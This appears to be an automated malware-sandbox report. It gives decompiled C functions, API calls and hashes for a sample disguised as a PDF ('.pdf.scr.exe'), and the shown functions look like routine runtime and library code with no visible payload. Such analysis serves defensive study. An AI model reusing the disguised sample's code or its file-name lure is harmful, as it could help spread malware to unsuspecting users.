                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                    • Instruction ID: 5c0c0e216d8651f804d26467eebcd25c89a02ebff33d4f783bd9cb9e3c5d9bf7
                                                    • Opcode Fuzzy Hash: 65a3389d8966381823ac69b5ccf42cacc89f42133234f446a2030d5895416df5
                                                    • Instruction Fuzzy Hash: 54F09632500291ABC734DB6AF9C5E1B73EABB00B147580819F11CD75A2CF70FE80CA51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CD1FDD(void* __eflags, short* _a4, short* _a8, int _a12) {
                                                    				void* _t10;
                                                    				int _t22;
                                                    				int _t23;
                                                    
                                                    				_t10 = E00CE3E13(_a4);
                                                    				_t23 = _a12;
                                                    				if(_t10 + 1 >= _t23) {
                                                    					_t22 = _t23;
                                                    				} else {
                                                    					_t4 = E00CE3E13(_a4) + 1; // 0x1
                                                    					_t22 = _t4;
                                                    				}
                                                    				if(E00CE3E13(_a8) + 1 < _t23) {
                                                    					_t7 = E00CE3E13(_a8) + 1; // 0x1
                                                    					_t23 = _t7;
                                                    				}
                                                    				return CompareStringW(0x400, 0x1001, _a4, _t22, _a8, _t23) - 2;
                                                    			}







                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CD1FE5
                                                    • _wcslen.LIBCMT ref: 00CD1FF6
                                                    • _wcslen.LIBCMT ref: 00CD2006
                                                    • _wcslen.LIBCMT ref: 00CD2014
                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CCB371,?,?,00000000,?,?,?), ref: 00CD202F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CompareString
                                                    • String ID:
                                                    • API String ID: 3397213944-0
                                                    • Opcode ID: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                    • Instruction ID: 3f29670ca517987d33570b52eb38ec9c3ead43cd6d3289fcf1ecf6db1f3aba69
                                                    • Opcode Fuzzy Hash: 144ee20ec35a5efa2a38232e60ff73bf87ad946e968d2b504ecb3e9e5e830549
                                                    • Instruction Fuzzy Hash: C7F03033008094BFCF265F52EC09DCE7F26EB54770B118416F61A5B061CB72E661E6D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 91%
                                                    			E00CE8900(signed int __ecx) {
                                                    				intOrPtr _t7;
                                                    
                                                    				asm("lock xadd [eax], ecx");
                                                    				if((__ecx | 0xffffffff) == 0) {
                                                    					_t7 =  *0xcfee90; // 0x3392210
                                                    					if(_t7 != 0xcfec70) {
                                                    						E00CE8DCC(_t7);
                                                    						 *0xcfee90 = 0xcfec70;
                                                    					}
                                                    				}
                                                    				E00CE8DCC( *0xd22280);
                                                    				 *0xd22280 = 0;
                                                    				E00CE8DCC( *0xd22284);
                                                    				 *0xd22284 = 0;
                                                    				E00CE8DCC( *0xd226d0);
                                                    				 *0xd226d0 = 0;
                                                    				E00CE8DCC( *0xd226d4);
                                                    				 *0xd226d4 = 0;
                                                    				return 1;
                                                    			}





                                                    APIs
                                                    • _free.LIBCMT ref: 00CE891E
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CE8930
                                                    • _free.LIBCMT ref: 00CE8943
                                                    • _free.LIBCMT ref: 00CE8954
                                                    • _free.LIBCMT ref: 00CE8965
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                    • Instruction ID: 6fe375846a9ec809a7d2ba10b99151e87068a9b93c8fa5f4a5b083538cc18722
                                                    • Opcode Fuzzy Hash: 4b96daab27f3eab2e6e4730b50dcf96cab7028e22bb4a3c222693175ddcb2c52
                                                    • Instruction Fuzzy Hash: 8AF0DA72810767EB87666F15FC0253D3BA2FB347253050606F518D67B2CB328A46EBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 19%
                                                    			E00CD15FE(intOrPtr* __ecx) {
                                                    				char _v516;
                                                    				char _v5124;
                                                    				signed int _t33;
                                                    				void* _t45;
                                                    				signed int _t46;
                                                    				signed int _t47;
                                                    				signed int _t48;
                                                    				signed int _t51;
                                                    				void* _t61;
                                                    				void* _t62;
                                                    
                                                    				E00CDEC50(0x1400);
                                                    				_t57 = __ecx;
                                                    				_t33 =  *(__ecx + 0x48);
                                                    				_t61 = _t33 - 0x74;
                                                    				if(_t61 > 0) {
                                                    					__eflags = _t33 - 0x83;
                                                    					if(_t33 == 0x83) {
                                                    						E00CDD694();
                                                    						__eflags =  *(_t57 + 4);
                                                    						if( *(_t57 + 4) == 0) {
                                                    							E00CD0602( &_v5124, E00CCE617(0xc9), 0xa00);
                                                    						} else {
                                                    							E00CC4092( &_v5124, 0xa00, E00CCE617(0xca),  *(_t57 + 4));
                                                    						}
                                                    						return E00CDA7E4( *0xd08450,  &_v5124, E00CCE617(0x96), 0);
                                                    					}
                                                    				} else {
                                                    					if(_t61 == 0) {
                                                    						_push(0x456);
                                                    						L38:
                                                    						_push(E00CCE617());
                                                    						_push( *_t57);
                                                    						L19:
                                                    						_t45 = E00CDB776();
                                                    						L11:
                                                    						return _t45;
                                                    					}
                                                    					_t62 = _t33 - 0x16;
                                                    					if(_t62 > 0) {
                                                    						__eflags = _t33 - 0x38;
                                                    						if(__eflags > 0) {
                                                    							_t46 = _t33 - 0x39;
                                                    							__eflags = _t46;
                                                    							if(_t46 == 0) {
                                                    								_push(0x8c);
                                                    								goto L38;
                                                    							}
                                                    							_t47 = _t46 - 1;
                                                    							__eflags = _t47;
                                                    							if(_t47 == 0) {
                                                    								_push(0x6f);
                                                    								goto L38;
                                                    							}
                                                    							_t48 = _t47 - 1;
                                                    							__eflags = _t48;
                                                    							if(_t48 == 0) {
                                                    								_push( *((intOrPtr*)(__ecx + 4)));
                                                    								_push(0x406);
                                                    								goto L13;
                                                    							}
                                                    							_t51 = _t48 - 9;
                                                    							__eflags = _t51;
                                                    							if(_t51 == 0) {
                                                    								_push(0x343);
                                                    								goto L38;
                                                    							}
                                                    							_t33 = _t51 - 1;
                                                    							__eflags = _t33;
                                                    							if(_t33 == 0) {
                                                    								_push(0x86);
                                                    								goto L38;
                                                    							}
                                                    						} else {
                                                    							if(__eflags == 0) {
                                                    								_push(0x67);
                                                    								goto L38;
                                                    							}
                                                    							_t33 = _t33 - 0x17;
                                                    							__eflags = _t33 - 0xb;
                                                    							if(_t33 <= 0xb) {
                                                    								switch( *((intOrPtr*)(_t33 * 4 +  &M00CD190E))) {
                                                    									case 0:
                                                    										_push(0xde);
                                                    										goto L18;
                                                    									case 1:
                                                    										_push(0xe1);
                                                    										goto L18;
                                                    									case 2:
                                                    										_push(0xb4);
                                                    										goto L38;
                                                    									case 3:
                                                    										_push(0x69);
                                                    										goto L38;
                                                    									case 4:
                                                    										_push(0x6a);
                                                    										goto L38;
                                                    									case 5:
                                                    										_push( *((intOrPtr*)(__esi + 4)));
                                                    										_push(0x68);
                                                    										goto L13;
                                                    									case 6:
                                                    										_push(0x46f);
                                                    										goto L38;
                                                    									case 7:
                                                    										_push(0x470);
                                                    										goto L38;
                                                    									case 8:
                                                    										_push( *((intOrPtr*)(__esi + 4)));
                                                    										_push(0x471);
                                                    										goto L13;
                                                    									case 9:
                                                    										goto L64;
                                                    									case 0xa:
                                                    										_push( *((intOrPtr*)(__esi + 4)));
                                                    										_push(0x71);
                                                    										goto L13;
                                                    									case 0xb:
                                                    										E00CCE617(0xc8) =  &_v516;
                                                    										__eax = E00CC4092( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
                                                    										_push( *((intOrPtr*)(__esi + 8)));
                                                    										__eax =  &_v516;
                                                    										_push( &_v516);
                                                    										return E00CDB776( *__esi, L"%s: %s");
                                                    								}
                                                    							}
                                                    						}
                                                    					} else {
                                                    						if(_t62 == 0) {
                                                    							_push( *__ecx);
                                                    							_push(0xdd);
                                                    							L23:
                                                    							E00CCE617();
                                                    							L7:
                                                    							_push(0);
                                                    							L8:
                                                    							return E00CDB776();
                                                    						}
                                                    						if(_t33 <= 0x15) {
                                                    							switch( *((intOrPtr*)(_t33 * 4 +  &M00CD18B6))) {
                                                    								case 0:
                                                    									_push( *__esi);
                                                    									_push(L"%ls");
                                                    									_push(">");
                                                    									goto L8;
                                                    								case 1:
                                                    									_push( *__ecx);
                                                    									_push(L"%ls");
                                                    									goto L7;
                                                    								case 2:
                                                    									_push(0);
                                                    									__eax = E00CDAECD();
                                                    									goto L11;
                                                    								case 3:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x7b);
                                                    									goto L13;
                                                    								case 4:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x7a);
                                                    									goto L13;
                                                    								case 5:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x7c);
                                                    									goto L13;
                                                    								case 6:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0xca);
                                                    									goto L13;
                                                    								case 7:
                                                    									_push(0x70);
                                                    									L18:
                                                    									_push(E00CCE617());
                                                    									_push(0);
                                                    									goto L19;
                                                    								case 8:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x72);
                                                    									goto L13;
                                                    								case 9:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x78);
                                                    									goto L13;
                                                    								case 0xa:
                                                    									_push( *__esi);
                                                    									_push(0x85);
                                                    									goto L23;
                                                    								case 0xb:
                                                    									_push( *__esi);
                                                    									_push(0x204);
                                                    									goto L23;
                                                    								case 0xc:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x84);
                                                    									goto L13;
                                                    								case 0xd:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x83);
                                                    									goto L13;
                                                    								case 0xe:
                                                    									goto L64;
                                                    								case 0xf:
                                                    									_push( *((intOrPtr*)(__esi + 8)));
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									__eax = E00CCE617(0xd2);
                                                    									return __eax;
                                                    								case 0x10:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0x79);
                                                    									goto L13;
                                                    								case 0x11:
                                                    									_push( *((intOrPtr*)(__esi + 4)));
                                                    									_push(0xdc);
                                                    									L13:
                                                    									_push(E00CCE617());
                                                    									_push( *_t57);
                                                    									goto L8;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				L64:
                                                    				return _t33;
                                                    			}













                                                    0x00000000
                                                    0x00000000
                                                    0x00cd176f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1773
                                                    0x00cd1776
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd177d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1784
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd178b
                                                    0x00cd178e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1798
                                                    0x00cd179b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd17b0
                                                    0x00cd17bc
                                                    0x00cd17c1
                                                    0x00cd17c4
                                                    0x00cd17ca
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd173e
                                                    0x00cd1738
                                                    0x00cd1629
                                                    0x00cd1629
                                                    0x00cd171a
                                                    0x00cd171c
                                                    0x00cd16be
                                                    0x00cd16be
                                                    0x00cd1646
                                                    0x00cd1646
                                                    0x00cd1648
                                                    0x00000000
                                                    0x00cd164d
                                                    0x00cd1632
                                                    0x00cd1638
                                                    0x00000000
                                                    0x00cd1655
                                                    0x00cd1657
                                                    0x00cd165c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd163f
                                                    0x00cd1641
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1663
                                                    0x00cd1665
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1670
                                                    0x00cd1673
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd167f
                                                    0x00cd1682
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1686
                                                    0x00cd1689
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd168d
                                                    0x00cd1690
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1697
                                                    0x00cd1699
                                                    0x00cd169e
                                                    0x00cd169f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16a9
                                                    0x00cd16ac
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16b0
                                                    0x00cd16b3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16b7
                                                    0x00cd16b9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16c6
                                                    0x00cd16c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16cf
                                                    0x00cd16d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16d9
                                                    0x00cd16dc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd16e3
                                                    0x00cd16e6
                                                    0x00cd16ee
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1703
                                                    0x00cd1706
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd170d
                                                    0x00cd1710
                                                    0x00cd1675
                                                    0x00cd167a
                                                    0x00cd167b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd1638
                                                    0x00cd1632
                                                    0x00cd1623
                                                    0x00cd18b2
                                                    0x00cd18b2

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _swprintf
                                                    • String ID: %ls$%s: %s
                                                    • API String ID: 589789837-2259941744
                                                    • Opcode ID: 43f7794fd90260a8f5aac0ff9ae18c7d50870539cc93efda003e34e0514f3455
                                                    • Instruction ID: c5e3a6082581030df05f3c06fb84e5ce5b04b4cf127bc6fbaaa8cbc8ddf14a7e
                                                    • Opcode Fuzzy Hash: 43f7794fd90260a8f5aac0ff9ae18c7d50870539cc93efda003e34e0514f3455
                                                    • Instruction Fuzzy Hash: C4515B31288304F6F6216A918D46F367265EB05B00F2D450BFF96A46F1D9B2E912F71B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CE7F6E(void* __ecx, void* __edx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				void* _v12;
                                                    				char _v16;
                                                    				intOrPtr* _t36;
                                                    				struct HINSTANCE__* _t37;
                                                    				struct HINSTANCE__* _t43;
                                                    				intOrPtr* _t44;
                                                    				intOrPtr* _t45;
                                                    				CHAR* _t49;
                                                    				struct HINSTANCE__* _t50;
                                                    				void* _t52;
                                                    				struct HINSTANCE__* _t55;
                                                    				intOrPtr* _t59;
                                                    				struct HINSTANCE__* _t64;
                                                    				intOrPtr _t65;
                                                    
                                                    				_t52 = __ecx;
                                                    				if(_a4 == 2 || _a4 == 1) {
                                                    					E00CEBB30(_t52);
                                                    					GetModuleFileNameA(0, 0xd22128, 0x104);
                                                    					_t49 =  *0xd226d8; // 0x33833a8
                                                    					 *0xd226e0 = 0xd22128;
                                                    					if(_t49 == 0 ||  *_t49 == 0) {
                                                    						_t49 = 0xd22128;
                                                    					}
                                                    					_v8 = 0;
                                                    					_v16 = 0;
                                                    					E00CE8092(_t52, _t49, 0, 0,  &_v8,  &_v16);
                                                    					_t64 = E00CE8207(_v8, _v16, 1);
                                                    					if(_t64 != 0) {
                                                    						E00CE8092(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                    						if(_a4 != 1) {
                                                    							_v12 = 0;
                                                    							_push( &_v12);
                                                    							_t50 = E00CEB643(_t64);
                                                    							if(_t50 == 0) {
                                                    								_t59 = _v12;
                                                    								_t55 = 0;
                                                    								_t36 = _t59;
                                                    								if( *_t59 == 0) {
                                                    									L15:
                                                    									_t37 = 0;
                                                    									 *0xd226cc = _t55;
                                                    									_v12 = 0;
                                                    									_t50 = 0;
                                                    									 *0xd226d0 = _t59;
                                                    									L16:
                                                    									E00CE8DCC(_t37);
                                                    									_v12 = 0;
                                                    									goto L17;
                                                    								} else {
                                                    									goto L14;
                                                    								}
                                                    								do {
                                                    									L14:
                                                    									_t36 = _t36 + 4;
                                                    									_t55 =  &(_t55->i);
                                                    								} while ( *_t36 != 0);
                                                    								goto L15;
                                                    							}
                                                    							_t37 = _v12;
                                                    							goto L16;
                                                    						}
                                                    						 *0xd226cc = _v8 - 1;
                                                    						_t43 = _t64;
                                                    						_t64 = 0;
                                                    						 *0xd226d0 = _t43;
                                                    						goto L10;
                                                    					} else {
                                                    						_t44 = E00CE91A8();
                                                    						_push(0xc);
                                                    						_pop(0);
                                                    						 *_t44 = 0;
                                                    						L10:
                                                    						_t50 = 0;
                                                    						L17:
                                                    						E00CE8DCC(_t64);
                                                    						return _t50;
                                                    					}
                                                    				} else {
                                                    					_t45 = E00CE91A8();
                                                    					_t65 = 0x16;
                                                    					 *_t45 = _t65;
                                                    					E00CE9087();
                                                    					return _t65;
                                                    				}
                                                    			}



















                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\026910003102350.pdf.scr.exe,00000104), ref: 00CE7FAE
                                                    • _free.LIBCMT ref: 00CE8079
                                                    • _free.LIBCMT ref: 00CE8083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                    • API String ID: 2506810119-423393661
                                                    • Opcode ID: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                    • Instruction ID: 387d927f480fabf4b5090ee5ed7348c62a5aef3065347b6474192da343cc20bc
                                                    • Opcode Fuzzy Hash: a648f229f2009d9f3fae267422e72e443b61075093e6ab5d635c4321346a60dc
                                                    • Instruction Fuzzy Hash: 9631BF71A00298AFCB21DF9ADC80DAEBBBCEF94310F104166F91897211DB718E49DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00CE31D6(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				intOrPtr* _v16;
                                                    				signed int _v20;
                                                    				char _v24;
                                                    				intOrPtr _v28;
                                                    				signed int _v36;
                                                    				void* _v40;
                                                    				intOrPtr _v44;
                                                    				signed int _v48;
                                                    				intOrPtr _v56;
                                                    				void _v60;
                                                    				signed char* _v68;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				char _t76;
                                                    				signed int _t78;
                                                    				signed int _t80;
                                                    				signed char* _t81;
                                                    				signed int _t82;
                                                    				signed int _t83;
                                                    				intOrPtr* _t87;
                                                    				void* _t90;
                                                    				signed char* _t93;
                                                    				intOrPtr* _t96;
                                                    				signed char _t97;
                                                    				signed int _t98;
                                                    				signed int _t99;
                                                    				intOrPtr* _t101;
                                                    				signed int _t102;
                                                    				signed int _t103;
                                                    				signed char _t108;
                                                    				signed char* _t111;
                                                    				signed int _t112;
                                                    				void* _t113;
                                                    				signed char* _t116;
                                                    				void* _t121;
                                                    				signed int _t123;
                                                    				void* _t130;
                                                    				void* _t131;
                                                    
                                                    				_t110 = __edx;
                                                    				_t100 = __ecx;
                                                    				_t96 = _a4;
                                                    				_t132 =  *_t96 - 0x80000003;
                                                    				if( *_t96 == 0x80000003) {
                                                    					return _t74;
                                                    				} else {
                                                    					_push(_t121);
                                                    					_push(_t113);
                                                    					_t75 = E00CE2AEC(_t96, __ecx, __edx, _t113, _t121, _t132);
                                                    					_t133 =  *((intOrPtr*)(_t75 + 8));
                                                    					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                    						__imp__EncodePointer(0);
                                                    						_t121 = _t75;
                                                    						if( *((intOrPtr*)(E00CE2AEC(_t96, __ecx, __edx, 0, _t121, _t133) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                    							_t87 = E00CE0961(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                    							_t130 = _t130 + 0x1c;
                                                    							if(_t87 != 0) {
                                                    								L16:
                                                    								return _t87;
                                                    							}
                                                    						}
                                                    					}
                                                    					_t76 = _a20;
                                                    					_v24 = _t76;
                                                    					_v20 = 0;
                                                    					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                    						_push(_a28);
                                                    						E00CE0894(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                    						_t112 = _v36;
                                                    						_t131 = _t130 + 0x18;
                                                    						_t87 = _v40;
                                                    						_v16 = _t87;
                                                    						_v8 = _t112;
                                                    						if(_t112 < _v28) {
                                                    							_t102 = _t112 * 0x14;
                                                    							_v12 = _t102;
                                                    							do {
                                                    								_t103 = 5;
                                                    								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                    								_t131 = _t131 + 0xc;
                                                    								if(_v60 <= _t90 && _t90 <= _v56) {
                                                    									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                    									_t108 = _t93[4];
                                                    									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                    										if(( *_t93 & 0x00000040) == 0) {
                                                    											_push(0);
                                                    											_push(1);
                                                    											E00CE2DB1(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                    											_t112 = _v8;
                                                    											_t131 = _t131 + 0x30;
                                                    										}
                                                    									}
                                                    								}
                                                    								_t112 = _t112 + 1;
                                                    								_t87 = _v16;
                                                    								_t102 = _v12 + 0x14;
                                                    								_v8 = _t112;
                                                    								_v12 = _t102;
                                                    							} while (_t112 < _v28);
                                                    						}
                                                    						goto L16;
                                                    					}
                                                    					E00CE8D24(_t96, _t110, 0, _t121);
                                                    					asm("int3");
                                                    					_t111 = _v68;
                                                    					_push(_t96);
                                                    					_push(_t121);
                                                    					_push(0);
                                                    					_t78 = _t111[4];
                                                    					__eflags = _t78;
                                                    					if(_t78 == 0) {
                                                    						L41:
                                                    						_t80 = 1;
                                                    						__eflags = 1;
                                                    					} else {
                                                    						_t101 = _t78 + 8;
                                                    						__eflags =  *_t101;
                                                    						if( *_t101 == 0) {
                                                    							goto L41;
                                                    						} else {
                                                    							__eflags =  *_t111 & 0x00000080;
                                                    							_t116 = _a4;
                                                    							if(( *_t111 & 0x00000080) == 0) {
                                                    								L23:
                                                    								_t97 = _t116[4];
                                                    								_t123 = 0;
                                                    								__eflags = _t78 - _t97;
                                                    								if(_t78 == _t97) {
                                                    									L33:
                                                    									__eflags =  *_t116 & 0x00000002;
                                                    									if(( *_t116 & 0x00000002) == 0) {
                                                    										L35:
                                                    										_t81 = _a8;
                                                    										__eflags =  *_t81 & 0x00000001;
                                                    										if(( *_t81 & 0x00000001) == 0) {
                                                    											L37:
                                                    											__eflags =  *_t81 & 0x00000002;
                                                    											if(( *_t81 & 0x00000002) == 0) {
                                                    												L39:
                                                    												_t123 = 1;
                                                    												__eflags = 1;
                                                    											} else {
                                                    												__eflags =  *_t111 & 0x00000002;
                                                    												if(( *_t111 & 0x00000002) != 0) {
                                                    													goto L39;
                                                    												}
                                                    											}
                                                    										} else {
                                                    											__eflags =  *_t111 & 0x00000001;
                                                    											if(( *_t111 & 0x00000001) != 0) {
                                                    												goto L37;
                                                    											}
                                                    										}
                                                    									} else {
                                                    										__eflags =  *_t111 & 0x00000008;
                                                    										if(( *_t111 & 0x00000008) != 0) {
                                                    											goto L35;
                                                    										}
                                                    									}
                                                    									_t80 = _t123;
                                                    								} else {
                                                    									_t59 = _t97 + 8; // 0x6e
                                                    									_t82 = _t59;
                                                    									while(1) {
                                                    										_t98 =  *_t101;
                                                    										__eflags = _t98 -  *_t82;
                                                    										if(_t98 !=  *_t82) {
                                                    											break;
                                                    										}
                                                    										__eflags = _t98;
                                                    										if(_t98 == 0) {
                                                    											L29:
                                                    											_t83 = _t123;
                                                    										} else {
                                                    											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                    											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
                                                    											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                    												break;
                                                    											} else {
                                                    												_t101 = _t101 + 2;
                                                    												_t82 = _t82 + 2;
                                                    												__eflags = _t99;
                                                    												if(_t99 != 0) {
                                                    													continue;
                                                    												} else {
                                                    													goto L29;
                                                    												}
                                                    											}
                                                    										}
                                                    										L31:
                                                    										__eflags = _t83;
                                                    										if(_t83 == 0) {
                                                    											goto L33;
                                                    										} else {
                                                    											_t80 = 0;
                                                    										}
                                                    										goto L42;
                                                    									}
                                                    									asm("sbb eax, eax");
                                                    									_t83 = _t82 | 0x00000001;
                                                    									__eflags = _t83;
                                                    									goto L31;
                                                    								}
                                                    							} else {
                                                    								__eflags =  *_t116 & 0x00000010;
                                                    								if(( *_t116 & 0x00000010) != 0) {
                                                    									goto L41;
                                                    								} else {
                                                    									goto L23;
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					L42:
                                                    					return _t80;
                                                    				}
                                                    			}

                                                    APIs
